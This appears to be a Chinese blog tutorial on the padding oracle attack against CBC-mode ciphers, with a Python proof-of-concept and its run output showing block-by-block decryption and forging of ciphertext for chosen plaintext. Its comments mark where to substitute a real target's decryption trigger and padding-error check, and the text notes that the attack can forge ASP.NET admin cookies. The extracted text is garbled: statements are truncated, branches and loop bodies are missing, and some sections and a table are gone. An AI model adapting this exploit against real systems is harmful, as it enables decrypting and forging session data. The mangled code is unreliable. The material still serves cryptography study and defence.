Padding Oracle Attack的一些细节与实现

Padding Oracle Attack还是颇具威力的,ASP.NET的Padding Oracle Attack被Pwnie评为2010年最佳服务端漏洞之一。还是看 Juliano Rizzo and Thai Duong 的相关Paper。


    另外就是padbuster这个工具也是针对padding oracle的自动化实现,而且作者写的文章也是阐述padding oracle攻击原理最好的一篇。云舒还根据此篇文章写了个学习笔记,英文不好的同学可以看看看看云舒的中文版。因为前人已经写得很好了,我在此就不深入讲padding oracle的原理了,而是讲讲一些实现方面的细节。


    但padbuster这个工具在我看来并不好使,它与网络耦合太紧密了,为此我自己实现了一个padding oracle的自动化工具。自己实现一遍果然是加深理解的最好方法。在现实攻击中,只需要看懂了我的代码,并在适当的地方做些定制化的修改即可写出exploit,此举也可过滤掉一些scriptkids。连续花了三天,奋战数个小时,终于完成了这份POC代码,想算法死了不少脑细胞。写得过程中完全没有参考padbuster的code,纯粹是依据自己对padding oracle的理解而写成。另外因为工作环境的原因,我的注释是用英文写的。


Padding Oracle Attack能做什么?

    padding oracle针对的是加密算法中的CBC Mode,当加密算法使用CBC Mode时,如果满足攻击条件,那么利用Padding Oracle能够在不知道密钥的情况下,解密任意密文,或者构造出任意明文的合法密文


    如果你不能理解这句话的话,那么想想ASP.NET 的padding oracle攻击,能够使得攻击者完全解密网站的Cookie,或者是构造一个admin的Cookie,只要你知道Cookie明文的格式。


    需要注意的是,padding oracle针对的是CBC模式,而不是某一个加密算法,所以任何分组加密算法,只要使用了CBC模式,都会受到影响。此类加密算法包括AES、DES、3-DES、Blowfish。。。。。。


Padding Oracle Attack的条件

    但padding oracle不是没有任何限制的,否则世界就乱套了。padding oracle attack的达成条件是

1. 攻击者能够获得密文(ciphertext),以及密文对应的IV(初始化向量)

2. 攻击者能够触发密文的解密过程,且能够知道密文的解密结果











    综合这些因素,在一般的互联网应用中,对称加密算法的使用离不开这么几种算法: cipher(RC4、XOR之流)

        2.分组加密算法中的DES、3-DES、AES、Blowfish等,且因为性能的问题,模式选择可能大多数是 ECB、CBC,因为CFB模式等可能导致性能消耗增加若干倍,是架构师所不愿意看到的事情。

        3. 程序员自己实现的一些野鸡算法(这种是最挫的,任何一本讲应用密码学的书应该都写了一条原则:不要自己实现加密算法)。


    其次,几种常见的加密算法还有一个特征,就是密文的长度。对于stream cipher来说,明文的长度和密文的长度是一样的,密文的长度是没有规律的,所以如果看到了奇数字节的密文,若不是密文还附加了别的东西,就几乎可以断定是stream cipher了。

    而分组加密算法的block size和key size都是固定的,见下表:



    比如 AES 的密文,必然是16的整数倍长度,DES、3-DES等则是8的整数倍。





        907EA2E95B5A832B6EC8D5C2757C3866A202CDC7231AF5669CBD762F1B7F8A0F  (64字节)



        所以这段密文的实际长度,应该是 64/2 = 32  字节。如果按照8字节(64 bit)分组,就是:













    padding oracle attack的第二个条件,也是最关键的一个,是能够触发解密过程,且能够知道密文的解密结果。这是最为关键的一个条件。因为加密算法的加解密必须遵循一定的padding原则,如果padding不正确,则解密就可能不会成功。padding oracle attack就是通过验证解密时产生的明文是否符合padding的原则,来判断解密是否成功的

    padding的规则有很多种,在padding oracle attack中,使用的padding规则是 PKCS#5,它填充的每个字节值即为需要填充的字节数,即:


    如果解密出来明文的padding正确,则解密过程顺利完成。但在具体应用中,根据padding oracle解密出来的明文必然不是应用程序原本想要获得的结果,因此有可能出现一个业务上的自定义错误;

    padding oracle attack正是利用了这两个错误之间的差异,来验证padding是否正确。所以能够验证解密后的结果,是padding oracle实施的必要条件。

    在padbuster作者的文章中,他是通过服务端返回错误来验证的。如果服务端解密时发现padding错误,会抛出一个 500的错误:






 自动化实现Padding Oracle Attack

    了解了padding oracle的原理和条件后,就可以实现我们的padding oracle代码了。因为padding oracle的第二个条件,其本质是确认解密后的明文,是否满足PKCS#5的padding规则,因此在POC中,我写了一个函数验证明文的PKCS#5 padding是否正确。

    我使用的python加密算法库(),在padding不正确时也根本没有抛出异常。但我们通过对解密后明文的验证,同样能够完成padding oracle攻击。

    解密函数的触发,也是直接调用了加密算法函数进行的解密,但这并不影响我们POC padding oracle的过程。



    Padding Oracle 还可以实现任意自定义明文的加密,返回可以解密成此明文的密文和IV。其原理主要是获取解密过程中的一个临时中间值。如果有多个block时,需要从最后一个block开始推导。










  # you may config this part by yourself


  iv = '12345678'   ===》 iv,随便自定义一个,需要和block size一样大小,我们需要这个值

  plain = 'aaaaaaaaaaaaaaaaX'  ===》 原本的明文,17字节,因为padding后可以分成3组

  plain_want = "opaas"     ===》希望通过padding oracle,得到解密为此明文的密文

  # you can choose cipher: blowfish/AES/DES/DES3/CAST/ARC2

  cipher = "blowfish"    ===》 加密算法选择





[root@vps tmp]#python 


=== Padding Oracle Attack POC(CBC-MODE) ===

=== by axis ===

=== ===

=== 2011.9 ===


=== Generate Target Ciphertext ===

[+] plaintext is: aaaaaaaaaaaaaaaaX

[+] iv is: \x31\x32\x33\x34\x35\x36\x37\x38

[+] ciphertext is: \xd7\xe6\x5d\xc9\xd7\xbb\x49\xec\x61\xe2\x67\x7e\x1b\xba\x33\x85\x34\xfc\xcd\xe4\x9f\xaa\xe9\x72


=== Start Padding Oracle Decrypt ===


[+] Choosing Cipher: BLOWFISH

[*] Now try to decrypt block 0

[*] Block 0's ciphertext is: \xd7\xe6\x5d\xc9\xd7\xbb\x49\xec


[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x58

[*] Found padding oracle: \x50\x53\x52\x55\x54\x57\x56\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x54\x5b

[*] Found padding oracle: \x50\x53\x52\x55\x54\x57\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\x54\x55\x5a

[*] Found padding oracle: \x50\x53\x52\x55\x54\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\x50\x53\x52\x5d

[*] Found padding oracle: \x50\x53\x52\x55\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\x50\x51\x52\x53\x5c

[*] Found padding oracle: \x50\x53\x52\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x54\x53\x52\x51\x50\x5f

[*] Found padding oracle: \x50\x53\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\x54\x55\x52\x53\x50\x51\x5e

[*] Found padding oracle: \x50\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \x58\x5b\x5a\x5d\x5c\x5f\x5e\x51

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08


[+] Block 0 decrypt!

[+] intermediary value is: \x50\x53\x52\x55\x54\x57\x56\x59

[+] The plaintext of block 0 is: aaaaaaaa


[*] Now try to decrypt block 1

[*] Block 1's ciphertext is: \x61\xe2\x67\x7e\x1b\xba\x33\x85


[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x8c

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\xda\x28\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x2a\x8f

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\xda\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\xd9\x2b\x8e

[*] Found padding oracle: \xb6\x87\x3c\xa8\xb6\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\xb2\xde\x2c\x89

[*] Found padding oracle: \xb6\x87\x3c\xa8\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\xad\xb3\xdf\x2d\x88

[*] Found padding oracle: \xb6\x87\x3c\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x3a\xae\xb0\xdc\x2e\x8b

[*] Found padding oracle: \xb6\x87\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\x80\x3b\xaf\xb1\xdd\x2f\x8a

[*] Found padding oracle: \xb6\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \xbe\x8f\x34\xa0\xbe\xd2\x20\x85

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08


[+] Block 1 decrypt!

[+] intermediary value is: \xb6\x87\x3c\xa8\xb6\xda\x28\x8d

[+] The plaintext of block 1 is: aaaaaaaa


[*] Now try to decrypt block 2

[*] Block 2's ciphertext is: \x34\xfc\xcd\xe4\x9f\xaa\xe9\x72


[*] Try IV: \x00\x00\x00\x00\x00\x00\x00\x83

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\xbd\x34\x01

[*] Try IV: \x00\x00\x00\x00\x00\x00\x36\x80

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\xbd\x02\x02

[*] Try IV: \x00\x00\x00\x00\x00\xbe\x37\x81

[*] Found padding oracle: \x39\xe5\x60\x79\x1c\x03\x03\x03

[*] Try IV: \x00\x00\x00\x00\x18\xb9\x30\x86

[*] Found padding oracle: \x39\xe5\x60\x79\x04\x04\x04\x04

[*] Try IV: \x00\x00\x00\x7c\x19\xb8\x31\x87

[*] Found padding oracle: \x39\xe5\x60\x05\x05\x05\x05\x05

[*] Try IV: \x00\x00\x66\x7f\x1a\xbb\x32\x84

[*] Found padding oracle: \x39\xe5\x06\x06\x06\x06\x06\x06

[*] Try IV: \x00\xe2\x67\x7e\x1b\xba\x33\x85

[*] Found padding oracle: \x39\x07\x07\x07\x07\x07\x07\x07

[*] Try IV: \x31\xed\x68\x71\x14\xb5\x3c\x8a

[*] Found padding oracle: \x08\x08\x08\x08\x08\x08\x08\x08


[+] Block 2 decrypt!

[+] intermediary value is: \x39\xe5\x60\x79\x1c\xbd\x34\x82

[+] The plaintext of block 2 is: X


[+] Guess intermediary value is: \x50\x53\x52\x55\x54\x57\x56\x59\xb6\x87\x3c\xa8\xb6\xda\x28\x8d\x39\xe5\x60\x79\x1c\xbd\x34\x82

[+] plaintext = intermediary_value XOR original_IV

[+] Guess plaintext is: aaaaaaaaaaaaaaaaX


=== Start Padding Oracle Encrypt ===

[+] plaintext want to encrypt is: opaas

[+] Choosing Cipher: BLOWFISH

[*] After padding, plaintext becomes to: \x6f\x70\x61\x61\x73\x03\x03\x03


[+] Encrypt Success!

[+] The ciphertext you want is: \x34\xfc\xcd\xe4\x9f\xaa\xe9\x72

[+] IV is: \x56\x95\x01\x18\x6f\xbe\x37\x81


=== Let's verify the custom encrypt result ===

[+] Decrypt of ciphertext '\x34\xfc\xcd\xe4\x9f\xaa\xe9\x72' is:


[+] Bingo!

[root@vps tmp]#






    Padding Oracle Attack POC(CBC-MODE)

    Author: axis(



    This program is based on Juliano Rizzo and Thai Duong's talk on 

    Practical Padding Oracle Attack.(


    For Education Purpose Only!!!


    This program is free software: you can redistribute it and/or modify

    it under the terms of the GNU General Public License as published by

    the Free Software Foundation, either version 3 of the License, or

    (at your option) any later version.


    This program is distributed in the hope that it will be useful,

    but WITHOUT ANY WARRANTY; without even the implied warranty of


    GNU General Public License for more details.


    You should have received a copy of the GNU General Public License

    along with this program.  If not, see <>.



import sys



from Crypto.Cipher import *

import binascii


# the key for encrypt/decrypt

# we demo the poc here, so we need the key

# in real attack, you can trigger encrypt/decrypt in a complete blackbox env

ENCKEY = 'abcdefgh'


def main(args):


  print "=== Padding Oracle Attack POC(CBC-MODE) ==="

  print "=== by axis ==="

  print "=== ==="

  print "=== 2011.9 ==="




  # you may config this part by yourself

  iv = '12345678'

  plain = 'aaaaaaaaaaaaaaaaX'

  plain_want = "opaas"


  # you can choose cipher: blowfish/AES/DES/DES3/CAST/ARC2 

  cipher = "blowfish"



  block_size = 8

  if cipher.lower() == "aes":

    block_size = 16


  if len(iv) != block_size:

    print "[-] IV must be "+str(block_size)+" bytes long(the same as block_size)!"

    return False


  print "=== Generate Target Ciphertext ==="


  ciphertext = encrypt(plain, iv, cipher)

  if not ciphertext:

    print "[-] Encrypt Error!"

    return False


  print "[+] plaintext is: "+plain

  print "[+] iv is: "+hex_s(iv)

  print "[+] ciphertext is: "+ hex_s(ciphertext)



  print "=== Start Padding Oracle Decrypt ==="


  print "[+] Choosing Cipher: "+cipher.upper()


  guess = padding_oracle_decrypt(cipher, ciphertext, iv, block_size)


  if guess:

    print "[+] Guess intermediary value is: "+hex_s(guess["intermediary"])

    print "[+] plaintext = intermediary_value XOR original_IV"

    print "[+] Guess plaintext is: "+guess["plaintext"]



    if plain_want:

      print "=== Start Padding Oracle Encrypt ==="

      print "[+] plaintext want to encrypt is: "+plain_want

      print "[+] Choosing Cipher: "+cipher.upper()


      en = padding_oracle_encrypt(cipher, ciphertext, plain_want, iv, block_size)


      if en:

        print "[+] Encrypt Success!"

        print "[+] The ciphertext you want is: "+hex_s(en[block_size:])

        print "[+] IV is: "+hex_s(en[:block_size])



        print "=== Let's verify the custom encrypt result ==="

        print "[+] Decrypt of ciphertext '"+ hex_s(en[block_size:]) +"' is:"

        de = decrypt(en[block_size:], en[:block_size], cipher)

        if de == add_PKCS5_padding(plain_want, block_size):

          print de

          print "[+] Bingo!"


          print "[-] It seems something wrong happened!"

          return False


    return True


    return False



def padding_oracle_encrypt(cipher, ciphertext, plaintext, iv, block_size=8):

  # the last block

  guess_cipher = ciphertext[0-block_size:] 


  plaintext = add_PKCS5_padding(plaintext, block_size)

  print "[*] After padding, plaintext becomes to: "+hex_s(plaintext)



  block = len(plaintext)

  iv_nouse = iv # no use here, in fact we only need intermediary

  prev_cipher = ciphertext[0-block_size:] # init with the last cipher block

  while block > 0:

    # we need the intermediary value

    tmp = padding_oracle_decrypt_block(cipher, prev_cipher, iv_nouse, block_size, debug=False)


    # calculate the iv, the iv is the ciphertext of the previous block

    prev_cipher = xor_str( plaintext[block-block_size:block], tmp["intermediary"] )


    #save result

    guess_cipher = prev_cipher + guess_cipher


    block = block - block_size


  return guess_cipher  



def padding_oracle_decrypt(cipher, ciphertext, iv, block_size=8, debug=True):

  # split cipher into blocks; we will manipulate ciphertext block by block

  cipher_block = split_cipher_block(ciphertext, block_size)


  if cipher_block:

    result = {}

    result["intermediary"] = ''

    result["plaintext"] = ''


    counter = 0

    for c in cipher_block:

      if debug:

        print "[*] Now try to decrypt block "+str(counter)

        print "[*] Block "+str(counter)+"'s ciphertext is: "+hex_s(c)


      # padding oracle to each block

      guess = padding_oracle_decrypt_block(cipher, c, iv, block_size, debug)


      if guess:

        iv = c

        result["intermediary"] += guess["intermediary"]

        result["plaintext"] += guess["plaintext"]

        if debug:


          print "[+] Block "+str(counter)+" decrypt!"

          print "[+] intermediary value is: "+hex_s(guess["intermediary"])

          print "[+] The plaintext of block "+str(counter)+" is: "+guess["plaintext"]


        counter = counter+1


        print "[-] padding oracle decrypt error!"

        return False


    return result


    print "[-] ciphertext's block_size is incorrect!"    

    return False


def padding_oracle_decrypt_block(cipher, ciphertext, iv, block_size=8, debug=True):

  result = {}

  plain = ''

  intermediary = []  # list to save intermediary

  iv_p = [] # list to save the iv we found


  for i in range(1, block_size+1):

    iv_try = []

    iv_p = change_iv(iv_p, intermediary, i)


    # construct iv

    # iv = \x00...(several 0 bytes) + \x0e(the bruteforce byte) + \xdc...(the iv bytes we found)

    for k in range(0, block_size-i):



    # bruteforce iv byte for padding oracle

    # 1 bytes to bruteforce, then append the rest bytes



    for b in range(0,256):

      iv_tmp = iv_try

      iv_tmp[len(iv_tmp)-1] = chr(b)


      iv_tmp_s = ''.join("%s" % ch for ch in iv_tmp)


      # append the result of iv, we've just calculate it, saved in iv_p

      for p in range(0,len(iv_p)):

        iv_tmp_s += iv_p[len(iv_p)-1-p]


      # in real attack, you have to replace this part to trigger the decrypt program

      #print hex_s(iv_tmp_s) # for debug

      plain = decrypt(ciphertext, iv_tmp_s, cipher)

      #print hex_s(plain) # for debug


      # got it!

      # in real attack, you have to replace this part to the padding error judgement

      if check_PKCS5_padding(plain, i):

        if debug:

          print "[*] Try IV: "+hex_s(iv_tmp_s)

          print "[*] Found padding oracle: " + hex_s(plain)


        intermediary.append(chr(b ^ i))




  plain = ''

  for ch in range(0, len(intermediary)):

    plain += chr( ord(intermediary[len(intermediary)-1-ch]) ^ ord(iv[ch]) )


  result["plaintext"] = plain

  result["intermediary"] = ''.join("%s" % ch for ch in intermediary)[::-1]

  return result


# save the iv bytes found by padding oracle into a list

def change_iv(iv_p, intermediary, p):

  for i in range(0, len(iv_p)):

    iv_p[i] = chr( ord(intermediary[i]) ^ p)

  return iv_p  


def split_cipher_block(ciphertext, block_size=8):

  if len(ciphertext) % block_size != 0:

    return False


  result = []

  length = 0

  while length < len(ciphertext):


    length += block_size


  return result



def check_PKCS5_padding(plain, p):

  if len(plain) % 8 != 0:

    return False


  # convert the string

  plain = plain[::-1]

  ch = 0

  found = 0

  while ch < p:

    if plain[ch] == chr(p):

      found += 1

    ch += 1 


  if found == p:

    return True


    return False


def add_PKCS5_padding(plaintext, block_size):

  s = ''

  if len(plaintext) % block_size == 0:

    return plaintext


  if len(plaintext) < block_size:

    padding = block_size - len(plaintext)


    padding = block_size - (len(plaintext) % block_size)


  for i in range(0, padding):

    plaintext += chr(padding)


  return plaintext


def decrypt(ciphertext, iv, cipher):

  # we only need the padding error itself, not the key

  # you may gain padding error info in other ways

  # in real attack, you may trigger decrypt program

  # a complete blackbox environment

  key = ENCKEY


  if cipher.lower() == "des":

    o =, DES.MODE_CBC,iv)

  elif cipher.lower() == "aes":

    o =, AES.MODE_CBC,iv)

  elif cipher.lower() == "des3":

    o =, DES3.MODE_CBC,iv)

  elif cipher.lower() == "blowfish":

    o =, Blowfish.MODE_CBC,iv)

  elif cipher.lower() == "cast":

    o =, CAST.MODE_CBC,iv)

  elif cipher.lower() == "arc2":

    o =, ARC2.MODE_CBC,iv)


    return False


  if len(iv) % 8 != 0:

    return False


  if len(ciphertext) % 8 != 0:

    return False


  return o.decrypt(ciphertext)



def encrypt(plaintext, iv, cipher):

  key = ENCKEY


  if cipher.lower() == "des":

    if len(key) != 8:

      print "[-] DES key must be 8 bytes long!"

      return False

    o =, DES.MODE_CBC,iv)

  elif cipher.lower() == "aes":

    if len(key) != 16 and len(key) != 24 and len(key) != 32:

      print "[-] AES key must be 16/24/32 bytes long!"

      return False

    o =, AES.MODE_CBC,iv)

  elif cipher.lower() == "des3":

    if len(key) != 16:

      print "[-] Triple DES key must be 16 bytes long!"

      return False

    o =, DES3.MODE_CBC,iv)

  elif cipher.lower() == "blowfish":

    o =, Blowfish.MODE_CBC,iv)

  elif cipher.lower() == "cast":

    o =, CAST.MODE_CBC,iv)

  elif cipher.lower() == "arc2":

    o =, ARC2.MODE_CBC,iv)


    return False


  plaintext = add_PKCS5_padding(plaintext, len(iv))  


  return o.encrypt(plaintext)


def xor_str(a,b):

  if len(a) != len(b):

    return False


  c = ''

  for i in range(0, len(a)):

    c += chr( ord(a[i]) ^ ord(b[i]) )


  return c


def hex_s(str):

  re = ''

  for i in range(0,len(str)):

    re += "\\x"+binascii.b2a_hex(str[i])

  return re


if __name__ == "__main__":





  • 0
  • 1
    觉得还不错? 一键收藏
  • 0


  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助




当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


